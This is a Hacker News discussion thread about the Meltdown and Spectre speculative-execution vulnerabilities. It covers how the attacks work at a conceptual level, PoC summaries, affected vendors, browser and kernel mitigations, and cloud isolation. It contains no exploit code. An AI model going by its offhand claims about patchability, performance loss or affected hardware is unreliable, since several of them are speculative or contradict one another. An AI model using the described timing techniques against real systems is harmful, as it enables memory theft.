The first section states that even with the branch prediction you still need to be in the same memory context to be able to read other process's memory through this. But eBPF lets you run JIT'd code in the kernel context.

I guess this JITing is also the issue with the web browsers, where you end up getting access to the entire browser process memory.

But ultimately the dangerous code is still code that got a "privilege upgrade"? the packet filter code for eBPF, and the JIT'd JS in the browser exploit?

So if our software _never_ brought user's code into the kernel space, then we would be a bit safer here? For example if eBPF worked in... kernel space, but a different kernel space from the main stuff? And Site Isolation in Chrome?


No. For that attack, the code that is speculatively executed does need to be in the target context, but that doesn't mean the code has to be attacker-supplied (that just makes it easier).

It's also possible to use existing code in the target context as the speculative execution path if it has the right form (and this is what P0's Variant 2 POC does, in that case by poisoning the branch predictor in order to make it speculatively execute a gadget that has the right form).


I should at first point out that I am by no definition an expert on CPU design, operating systems, or infosec.

But I just remembered that years ago the FreeBSD developers discovered a vulnerability in Intel's Hyperthreading that could allow a malicious process to read other processes' memory.[1]

To the degree that I understand what is going on here, that sounds very similar to the way the current vulnerabilities work.

For a while, back then, I was naive enough to think this would be the end of SMT on Intel CPUs, but I was very wrong about that.

So I am wondering - is this just a funny coincidence, or could people have seen this coming back then?

[1] http://www.daemonology.net/hyperthreading-considered-harmful...


The ARM whitepaper is also worth a read in terms of how it affects them and mitigations on that platform: https://developer.arm.com/support/security-update


I'm really amazed by the simplicity of the meltdown gadget. After the initial blog post I played with a few variants, but always got the zeroed out register in the speculative branch. I guess what people (including me) were looking for here was some other side channel or instruction that did not have this mitigation in place (e.g. I had hoped a cmpxchg would leak whether the target memory address matches the register to compare with). The shl/retry loop makes a lot of sense if you instead assume that the mitigation was implemented improperly and can race subsequent uops. I really can't imagine why this data ever made it to the bypass network to be available to other uops.


I wonder if the whole thing with enormously complex CPUs requiring deep pipelines which in turn requires complex speculation etc was a design mistake? Is there an alternative history where mainstream CPUs are equally fast with a dumber/simpler design?


There may well be. One alternative design that could have become the mainstream is VLIW. One of the features of VLIW is the idea of predication. Instead of a branch instruction altering the instruction fetch stream based upon the value of a flag bit in some form of condition code register, instruction syllables are encoded with predicates which simply control whether or not the instruction syllable has any effect, based upon the value of a flag bit in some form of predicate register.

VLIW is not a panacaea, engineering being all about tradeoffs after all. But it was intended to not have the complex instruction dispatching logic, with things like speculative execution and branch prediction, in the processor. Instead, using a process called if-conversion the compiler combines the two possible results of a conditional branch into a single instruction stream where predicates control which instruction syllables are executed.

* http://web.eecs.umich.edu/~mahlke/papers/1996/schlansker_hpl...

* https://www.isi.edu/~youngcho/cse560m/vliw.pdf

* https://www.cse.umich.edu/awards/pdfs/p45-mahlke.pdf

* http://web.eecs.umich.edu/~mahlke/papers/1996/schlansker_hpl...

Observe, in considering this alternative history, that the Itanium had 64 predicate registers. People have, in the past few days in various discussions of this subject, criticized Intel for holding on to a processor design for decades and prioritizing backwards compatibility over cleaner architecture. They have forgotten that Intel actually produced a cleaner architecture, back in the 1990s.


What requires the complex speculation is not the pipeline depth, it's the memory access latency.

Consider the following simple C code: "if (arr[idx]) { ... }". Without speculation, the core must stall until the condition has been read from memory, which can be hundreds of cycles if it's not in the cache. With speculation, these wasted cycles are instead used to do some of the work from most probable side of the branch, so when the condition finally arrives from memory, there's less work left to do.

The pipeline depth only affects what happens when the speculation predicted the wrong way: since the correct way is not on the pipeline, it has to fill the pipeline from scratch.


Not that we currently know about. RISC instead of CISC is better here as it shortens the pipeline, but even RISC processors do speculative predictions due to the cost of waiting till a branch is fully decided.


The vulnerability window is proportional to the size of the reorder buffer (hundreds of instructions); the pipeline length (tens of stages) is not important (except on strictly in order CPUs with no reorder buffer I guess).

Also modern OoO CISCs and RISCs have very similar pipeline depths for the same performance/power budget.


What about more radically different designs? E.g Mill or others?


The Mill does prediction:

https://millcomputing.com/docs/prediction/

It has to. The problem is the speed of light here, not a simple slipup by a CPU designer.


So all that needs to be done is make 64GB L1 on the die...


Not possible - the physical size of 64GB (even at nm scale) means that the time it takes for a signal to traverse it causes memory to take a long time to access, meaning you need a L0 cache to maintain performance.


We need to go 3d


The speed gains are very real so I wouldn't call it a mistake.

Side-effects could obviously been mitigated better, but hindsight 20/20.


Since no one has yet posted Amazon AWS security bulletin:

https://aws.amazon.com/security/security-bulletins/AWS-2018-...


https://github.com/IAIK/meltdown 404's. I assume this is by intention? So full disclosure, but missing the code? Or is it somewhere else?


Due to early embargo lifting, I expect not everything's been publicized yet


According to the page, Project Zero only tested with AMD Bulldozer CPUs. Why didn't they use something based on Zen/Ryzen? It's not clear if the 3 issues affect Zen/Ryzen or not.


Ryzen is affected by spectre but not meltdown by the looks of it


Just an idea that I had:

If these exploits seem rely on taking precise timing measurements (on the order of nanoseconds), could we eliminate or restrict this functionality in user space?

The Spectre exploit uses the RDTSC instruction, and this can apparently be restricted to privilege level 0 by setting the TSD flag in CR4.

I know it would kind of suck, but it might be better than nothing.

I would think that most typical user applications wouldn't require that accurate of a time measurement. If they do, then maybe they can be white listed?


Denying access to timers is kind of practical for browser JavaScript, and should and will happen. But it's not practical for native processes, because shared memory multithreading provides as high precision a timer as anyone could ask for: just increment a counter in a loop in a different thread.

In fact, the practical JavaScript attacks use this method (using SharedArrayBuffer) and the browsers are disabling this (new, little used) feature as a mitigation. But I'm afraid hell will freeze over before mainstream operating systems deny userspace access to clocks, threads, and memory mapped files, which is a lower bound on what it would take to make the attack much harder.


That is the approach Firefox is taking [1]:

> Since this new class of attacks involves measuring precise time intervals, as a partial, short-term, mitigation we are disabling or reducing the precision of several time sources in Firefox.

[1]: https://blog.mozilla.org/security/2018/01/03/mitigations-lan...


What is the reason that Intel would allow speculative instructions to bypass the supervisor bit and access arbitrary memory? That seems the root cause for Meltdown.

Is it that the current privilege level could be different between what it is now, and what it will be when the speculative instruction retires? If so then that seems a thin justification. CPL should not change often so it doesn't seem worth it to allow speculative execution for instructions where a higher CPL is required.


IIUC, these speculative instructions respect the current supervisor bit which was set by the previous faulting instruction.


There are 3 known CVEs related to this issue in combination with Intel, AMD, and ARM architectures. Additional exploits for other architectures are also known to exist. These include IBM System Z, POWER8 (Big Endian and Little Endian), and POWER9 (Little Endian).

https://access.redhat.com/security/vulnerabilities/speculati...


How come this wasn't discovered sooner?

It would seem to me that all the really smart people who designed super-scalar processors and all the nifty tricks that CPUs do today - would have thought that these attacks would be in the realm of possibility. If that's the case - who's to say these attacks haven't been used in the wild by sophisticated players for years now?

Seems like the perfect attack. Undetectable. No log traces.


Could somebody please coin a name for this? Wikipedia currently calls it "Intel KPTI flaw", but that is very vague. It's quite difficult to talk about something without a simple easy-to-remember name.

Edit: has been settled, it's https://en.wikipedia.org/wiki/Meltdown_(security_bug) .



the MEMTHIEF bug


Is there any information available about whether the Linux KPTI patch mitigates the ability to use eBPF to read kernel memory?

I'm asking because eBPF seems to execute within the kernel, and KPTI seemed to be about unmapping kernel page table when userspace processes execute.

Are there any mitigations to the eBPF attack vector?


sysctl -w kernel.unprivileged_bpf_disabled=1

I use eBPF all the time, but I never use it as non-root, so I haven't needed unprivileged bpf anyway.

update: that eBPF vector was already fixed, and another safety measure is already being considered https://lkml.org/lkml/2018/1/3/895


Isn't possible for the kernel to patch all clflush instructions when the software is loaded to keep a circular list of all evicted addresses that would be evicted again on the interrupt that happens when the protected address is read? This way the the timing attack would not be possible.


self modifying code (which exists) would take a massive performance hit. any time a page is marked +X, the kernel would have to mark it -W, and then on page fault the kernel would have to check if userspace was changing something to a clflush instruction.

oh, and x86 has variable length instructions - the same byte stream can decode as different instructions depending on where you start - so i doubt it's possible at all on x86 without a massive performance hit (you'd have to keep track of every jump instruction in the entire address space...)


You are right.

The best approach is to evict all user space pages from cache when an invalid page access happens if the page fault was caused by the software trying to read/write kernel space pages.

Massive performance hit but only to misbehaved software. Normal software will not have the performance hit of the current solution.

Kernel could even switch to unmapped kernel pages solution if too many read/write attempts.


clflush only makes the attack easier. There are other ways to flush the cache. Besides: code is mutable. You can just make a clflush instruction out of thin air without the loader's involvement.


For software that requires self-modifying code to run the existing Linux kernel patch would apply (performance penalty). If there is other ways to flush the cache it is necessary to evict the entire software memory on the interrupt.


So in all cases just evict the entire process memory from the cache when the interrupt is raised when reading from a protected memory. The performance penalty would apply only to misbehaved code.


Are extensions like 1password vulnerable do they run in the same process as js from a page?


Process is irrelevant for both Meltdown and Spectre.


Process is relevant for what you can get to from V8 VM.


Is this saying that AMD is affected? Is this the same as the Intel bug reported earlier?


Yes, AMD is affected. There are multiple vulnerabilities (Project Zero refers to 3 separate "variants", variant 1 and 2 being called "Spectre" and variant 3 being called "Meltdown"). The most serious variant only affects Intel, but can be patched. The other 2 variants affect AMD, ARM, and Intel, and cannot be patched.

See this excerpt from spectreattack.com:

>Which systems are affected by Meltdown?

>Desktop, Laptop, and Cloud computers may be affected by Meltdown. More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013). We successfully tested Meltdown on Intel processor generations released as early as 2011. Currently, we have only verified Meltdown on Intel processors. At the moment, it is unclear whether ARM and AMD processors are also affected by Meltdown.

>Which systems are affected by Spectre?

>Almost every system is affected by Spectre: Desktops, Laptops, Cloud Servers, as well as Smartphones. More specifically, all modern processors capable of keeping many instructions in flight are potentially vulnerable. In particular, we have verified Spectre on Intel, AMD, and ARM processors.


Of the variants of the attack that can leak privileged memory, AMD is only impacted if a non-default kernel configuration is enabled: "BPF JIT"


This is not correct. That's just what the POC chose to implement.


Google security blog says it is.

> These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running them.

https://security.googleblog.com/2018/01/todays-cpu-vulnerabi...


That's unclear, to the point of being factually wrong. Variant 2 and Variant 3 POCs only affect Intel, and those are the ones people are most talking about, and at least to me, the most concerning.

Treating them as a group, ignores the very real differences in effect.

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


https://meltdownattack.com/meltdown.pdf

>6.4 Limitations on ARM and AMD We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack described in Section 5, neither on ARM nor on AMD. The reasons for this can be manifold. First of all, our implementation might simply be too slow and a more optimized version might succeed. For instance, a more shallow out-of-order execution pipeline could tip the race condition towards against the data leakage. Similarly, if the processor lacks certain features, e.g., no re-order buffer, our current implementation might not be able to leak data. However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed.

Seems like the possibility exists that AMD/ARM could be affected, based on the behavior they saw, but they were not able to successfully verify.


the intel behaviour is probably the result of an optimization / architectural decision. like when the micro ops fetch a value from memory they are probably fetching the real value then setting a flag that the instruction is invalid. like it might be cheaper to deal with the problem later in the pipeline than earlier.

but it might also be reasonable in a different architecture to fetch 0 straight away to the micro op when the memory access is invalid and set a flag to raise the exception as well. in this situation you don't have the problem because you are just shuffling around invalid data.


That's fair, but the leads on multiple press releases are that this affects all processors equally which feels very disingenuous to me. Intel's latest press release for example.


From https://meltdownattack.com/meltdown.pdf, page 12:

> Thus, the isolation of containers sharing a kernel can be fully broken using Meltdown.


Looks like the information was somewhat public available since middle of the last year on https://cyber.wtf/2017/07/28/negative-result-reading-kernel-... and http://www.cs.binghamton.edu/%7Edima/micro16.pdf. Also similar methods from 2013 paper http://www.ieee-security.org/TC/SP2013/papers/4977a191.pdf (timing side channel attacks).

Any reason for the panic now? Any know malware using it?


No. This was all scheduled to be released on January 9th, but the release was sped up after people started connecting dots.

We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation.

https://security.googleblog.com/2018/01/todays-cpu-vulnerabi...


I know it was scheduled but the information on the links are public and prior to the scheduled disclosure. A hacker could figure out the problem by reading the available information before the Google Project Zero.


Juicy PoC exists?


Can someone show me an example of JavaScript code running in a browser that would display a password stored in kernel space?

Websites like the Guardian report that this is now the case but I don't understand how that's possible.


The kernel maps itself into the address space of each process as an optimization to increase the performance of system calls. So yes, it is possible.


So, which functions would you have to call? How would you read the secrets? You can't do any kind of pointer magic in JS (nor system calls).


Will patches for this eventually trickle down to things like LineageOS?


LineageOS is based on official Android sources. The moment the official Android kernel is patched, LineageOS will use the patch.


I like the way you say moment as if the android kernel is some single thing not a hodgepodge of hundreds of different kernels across tens of companies.


Thanks to incidents like these, I'm very happily employed. One of the perks of working in infosec.

I hereby nominate 2018's song to be Billy Joel's We Didn't Start the Fire.


Does this vulnerability affect Linux only, or any operating system?


The issue is with the chip. So, it should impact any OS running on the chip. This would include Windows as well as MacOS running on Intel chips.


Do we know how news of this got out before the disclosure date?


See this blog post, which is some very informed speculation based on public Linux kernel patch activity. http://pythonsweetness.tumblr.com/post/169166980422/the-myst...


I couldn't find it in the blog post or the Compute Engine Security Bulletin, does anyone know which version of Linux Kernel contains the mitigation?


4.14.11 is the only stable kernel as of this writing.


Based on a link here yesterday, there was a patch to the Linux kernel and comments associated with it.


This sounds really bad. I wonder: Will this have major implications on consumers other than slowed down devices?


does this mean the embargo is lifted?



> We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation.


Should we start to think seriously to adopt homomorphic encryption on virtualized environments?


No wonder they were rushing this.


As a side topic, are we really in a place that even vulnerabilities need branding and websites?


Why not? Those big security vulnerabilities are going to be discussed in years to come, might as well come up with something a little more catchy than CVE-2017-5753. I guess they could've gone with more descriptive names.

At least "spectre" and "meltdown" will be memorable even for non-technical people (who should probably be aware of the issue even if they don't understand the technical details). "Bounds check bypass" and "branch target injection" probably sound like random words stringed together for most people.


Well these are essentially research papers - and people invested lots of time & it'll have an impact on their career.

So yeah making it nice & pretty seems appropriate just like a CV


Thanks again to the geniuses who arranged things so that almost anyone can write code that I must run just so I can use the internet to find and to read public documents

(unless I undergo the tedious process of becoming a noscript user or something similar).


best for now to get your crypto coins off the exchanges if you have them there


"Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host."

Holy shit.


We should quote OpenBSD's Theo de Raadt here, all the way back from 2007:

"x86 virtualization is about basically placing another nearly full kernel, full of new bugs, on top of a nasty x86 architecture which barely has correct page protection. Then running your operating system on the other side of this brand new pile of shit."

https://marc.info/?l=openbsd-misc&m=119318909016582&w=2


Hmm. Is OpenBSD patched for Meltdown? I don't see anything on their main site.


> The infrastructure that runs Compute Engine and isolates customer workloads from each other is protected against known attacks. This also means that customer VMs are protected against known, infrastructure-based attacks from other malicious VMs.

Doesn't Google say that they are protected...?


This means that Customer A's VM cannot attack Customer B's VM.

However, if the OS inside the VM is unpatched, then code inside the VM can attack other code inside the VM. If for example you install some malware on your VM, it could use this attack.

(I am not a security expert, this is just my understanding and not a official Google statement)


Right. But it means that once the VM is fixed, assuming the customer does this, they are guarded from such attack right?


Not against Spectre, which can extract any memory via javascript or user applications. Eg your secret keys or passwords


Spectre is a much more serious bug I feel, but it requires the VM to run the malicious code snippet inside itself and with the right context, not from other guest VM, that is how I understand this. The kinda bug that would totally destroy cloud as a business is the one that other guest VM can read your memory...which doesn't seem like to be the case, for now...


Spectre is mostly about JavaScript extracting keys and passwords from the browser process. Install their ChromeZero extension for a start.

Meltdown on the other hand can do everything. But only on Intel.


This basically kills cloud computing for anything sensitive using shared hardware. In the short term this will actually be good for cloud providers because the demand for dedicated instances will shoot up as there is no short-term alternative.


> The infrastructure that runs Compute Engine and isolates customer workloads from each other is protected against known attacks. This also means that customer VMs are protected against known, infrastructure-based attacks from other malicious VMs.


The short term answer is to patch the servers and swallow the 30% performance cut. Still likely cheaper than dedicated servers.


Which could mean huge sales for Intel, or even AMD, if Amazon, DigitalOcean, Linode and others want to rush to get that lost performance back.

Going to AMD would be incredibly expensive as you'd be replacing nearly everything, but if Intel gets new chips out in a reasonable amount of time, they might actually make a killing on this.


"Compute Engine customers must update their virtual machine operating systems and applications so that their virtual machines are protected from intra-guest attacks and inter-guest attacks that exploit application-level vulnerabilities."

"Compute Engine customers should work with their operating system provider(s) to download and install the necessary patches."


Main/Big impacts are on the cloud computer.

For home computer, standard office use, there is no impact at this point, right?


Until someone figures out how to exploit it using JavaScript. The speed this moves it could be any minute now.


From spectre.pdf:

> In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

(granted I think site isolation, if enabled, mitigates crossing domain boundaries)

It goes on to show a sample JS impl that JITs into the expected insns using V8.


And we can't even read TFA with javascript disabled, you have to be less secure just to read the google security blog.

Edit - mixing it up with this other article (https://security.googleblog.com/2018/01/todays-cpu-vulnerabi...)


I can read the article without JS just fine.


Yet another argument against running any native or 1-to-1 bytecode in the browser like WASM


the big if is whether javascript code that can exploit this can be written. (edit: that's a yes, from the pdf itself...) if yes, nobody's safe, as any webpage (any webpage, even that ad in an iframe) could in theory read your password if it's anywhere in RAM.


Firefox and Chrome have both started posting mitigation strategies. They're mentioned in other comments, some depending on making time functions less accurate since this is a timing attack.


Chrome is listed as impacted. People use chrome password managers.


Chrome is listed as impacted due to javascript being able to read memory from outside the browser sandbox.

"In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it." - from the spectre paper


Was this quote removed from the article? I'm no longer able to find it.


>running on the host, can read host kernel memory at a rate of around 1500 bytes/second,

I kinda get how it works now. They force a speculative execution to do something with a protected memory address, and then measure the latency to guess the content. They did not found a way to continue execution after a page fault as rumors were.

The fact that speculative execution branch can access protected memory, but not to commit its own computation results to memory in ia32 was known since pentium 3 times.

It was dismissed as "theoretical only" vulnurability without possible practical application. Intel kept saying that for 20 years, but here it is, voila.

The ice broke in 2016 when Dmitry Ponomarev wrote about first practical exploit scenario for this well known ia32 branch prediction artifact. Since then, I believe, quite a few people were trying all and every possible instruction combination for use in timing attack until somebody finally got one that works that was shown behind closed doors.

Edit: google finally added reference to Ponomarev's paper. Here is his page with some other research on the topic http://www.cs.binghamton.edu/~dima/


link for details for that from Project Zero:

https://googleprojectzero.blogspot.com/2018/01/reading-privi...


Thanks! We've merged another thread and updated this link from https://security.googleblog.com/2018/01/todays-cpu-vulnerabi....


Interesting. Quoting a fair-sized chunk for context:

> So far, there are three known variants of the issue:

> Variant 1: bounds check bypass (CVE-2017-5753) > Variant 2: branch target injection (CVE-2017-5715) > Variant 3: rogue data cache load (CVE-2017-5754)

> During the course of our research, we developed the following proofs of concept (PoCs):

> A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.

> A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel's BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]

> A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian's distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn't been tested.)

> A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

If I'm reading this right, then the only POC that works against ARM is the first one, which lets you read data within the same process. Not too impressive. (Yes, I know that I'm reading into this that they tried to run all the POCs against all the processors. But the "Tested Processors" section lower down leads me to believe that they did in fact do so.)

The third and fourth POC seem to be Intel-specific.


The paper from the other people who discovered this says the same thing: "We also tried to reproduce the Meltdown bug on several ARM and AMD CPUs. However, we did not manage to successfully leak kernel memory with the attack de- scribed in Section 5, neither on ARM nor on AMD." The general purpose attack that leaks kernel memory, the one that KAISER fixes, only seems to work on Intel CPUs. Intel's press release was misleading.


Well... reading further, below the details of the third POC, they say "Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked."

So it seems like they tried it on AMD and ARM, but they tried much harder on Intel. That's less reassuring than my initial reading.


Way better link, thanks.


In 1-2 words, IMO, the problem is "over-optimisation".

It is perhaps beneficial to be using an easily portable OS that can be run on older computers, and a variety of architectures.

Sometimes older computers are resilient against some of todays attacks to the extent those attacks make assumptions about the hardware and software in use. (Same is true for software.)

When optimization reaches a point where it exposes one to attacks like the ones being discussed here, then maybe the question arises whether the optimization is actually a "design defect".

What is the solution?

IMO, having choice is at least part of any solution.

If every user is effectively "forced" to use the same hardware and the same software, perhaps from a single source or small number of sources, then that is beneficial for those sources but, IMO, counter to a real solution for users. Lack of viable alternatives is not beneficial to users.



I wonder what this sentence in the Google product status page (https://support.google.com/faqs/answer/7622138) means, particularly what the inter-guest attack refers to:

"Compute Engine customers must update their virtual machine operating systems and applications so that their virtual machines are protected from intra-guest attacks and inter-guest attacks that exploit application-level vulnerabilities"


What I understand is that the hypervisor of GCE has been patched already and so some customer running on the same machine as you can't exploit you. However if you are running KVM or something yourself on a Cloud instance (vm in a VM) then you should patch that.


Does anyone know what kind of isolation still can work after all the patches? Let's say we want to host users' processes or containers and some of them could be pwned. I see Google claiming that their VMs are isolated between the kernel and each other.


Intel has released a statement for the codename Meltdown bug:

https://newsroom.intel.com/news/intel-responds-to-security-r...


Again conflating the issue to include AMD. This feels so disingenuous.


> We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

Intel: "Recent reports that these exploits are caused by a “bug” or a “flaw” [..] are incorrect."

So much for "authoritative guidance", fuck these guys.


Arm also claims it is working as intended:

> Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog.

I personally don't agree, but I guess they're trying to avoid needing to issue a recall for over ten years worth of CPUs?


Then surely you must also argue that all data-dependent, side-channel attacks, such as key recovery attacks against some cryptographic algorithm implementations, are the fault of the hardware.

Unlike Intel, ARM and AMD are implicated only where the attacker can inject code or data (specifically data that is manipulated by pre-existing vulnerable code) into the target address space. The particular kernel exploits require injection of a JIT-compiled eBPF program, as they said they were unable to locate any suitable gadgets in existing compiled kernel code. I wouldn't rule out gadgets being found in the future, but much like cryptographic software timing attacks, the proper fix is to refactor sensitive software logic to be data independent. There's no way to implement an out-of-order, superscalar architecture and protect against this stuff simply because of the nature of memory hierarchies. All you can do is 1) ensure that privilege boundaries are obeyed (like AMD and ARM do, but Intel notable doesn't), and 2) provide guaranteed, constant-time instructions that programmers and compilers can reliably and conveniently leverage. Unfortunately, all the hardware vendors have sucked at providing #2 (much timing resilient cryptographic software relies on implicit, historical timing behavior, not architecturally guaranteed behavior), but it nonetheless still requires cooperation by software programers, making it a shared burden.

Also, FWIW, basically everybody outside the Linux echo chamber has known that eBPF JIT and especially unprivileged eBPF JIT was a disaster waiting to happen. This is only the latest exploit it's been at the center of, and the 2nd in as many months. The amount of attention and effort that has gone into securing eBPF is remarkable, but at the end of the day even if you could muster all the best programmers for as much time as you wanted it's still an exceptionally risky endeavor. Everything we know about the evolution of exploits screams that unprivileged eBPF JIT is an unrelenting nightmare. But it's convenient, flexible, and performant, and at the end of the day that's all people really care about, including most Linux kernel engineers. The nature of the Linux ecosystem is that even if Linus vetoed unprivileged eBPF JIT (optional or not), vendors would have likely shipped it anyhow. It's an indictment of the software industry. Blaming hardware vendors (except for the Intel issue) is just an excuse that perpetuates the abysmal state of software security.


>The particular kernel exploits require injection of a JIT-compiled eBPF program, as they said they were unable to locate any suitable gadgets in existing compiled kernel code

Did they say that?

I don't see anything saying they were unable to, just that they didn't bother to because it would take effort.

>But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.


The quote you have is for exploiting Variant 2, the post above yours was talking about Variant 1. For Variant 1, the authors say:

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

For Variant 1, the "vulnerable code pattern" they're looking for has to be of a very specific type, it's not a run-of-the-mill gadget. It has to load from an array with a user-controlled offset, then mask out a small number of bits from the result and use that as an offset to load from another array, where we can then time our accesses to that second array.

However, they also go on to say:

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.

Which seems much less reassuring.


Gotcha! Thanks for setting me straight here.


They go into detail in the white paper https://developer.arm.com/-/media/Files/pdf/Cache_Speculatio...

They are adding a new instruction to control speculation...


someone should honestly do a press release like "Intel Bug not actually Intel only" or give this thing a neutral name to search for.


Variant 2 and Variant 3 are Intel only. They are the most concerning as they break VM space.


Great, embargo was in and google went ahead disclosing and saying hear we're here disclosing this (because they've patched)


3 or 4 people had bits of demo code up on twitter earlier today.

I implemented it myself simply based on the clues in the press release from AMD explaining why they weren't vulnerable. I don't even have a computer security background.


So the vulnerability likely isn't something nobody thought of, it's just that nobody seriously expected the CPU vendors to make the mistake of speculating across multiple loads and actually leaving observable modifications in the caches.

Note that even speculating across multiple loads could lead to observable side-effects by measuring memory bandwidth to differentiate between loads of accessible and silent page fault addresses. [1]

An interesting question is whether the CPU would also speculate on loads from mapped PCI device regions, as that could be also detectable in many different ways.

[1] https://eprint.iacr.org/2016/613.pdf

> Both hardware thread systems (SMT and TMT) expose contention within the execution core. In SMT, the threads effectively compete in real time for access to functional units, the L1 cache, and speculation resources (such as the BTB). This is similar to the real-time sharing that occurs between separate cores, but includes all levels of the architecture. [...] SMT has been exploited in known attacks (Sections 4.2.1 and 4.3.1)


The papers take a while to get to the point. I nearly fell asleep re-reading the same statements until they got to the point: speculative execution of buffer overflows.

Could have been said more concisely. Sadly, this seems to be the norm with academic texts.


It gives all the required context, much needed for an "average" engineer to understand it. Without that, most of the people, except the microchip engineers, would have to read about the related topics first anyways. I personally was surprised at how understandably everything was explained.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: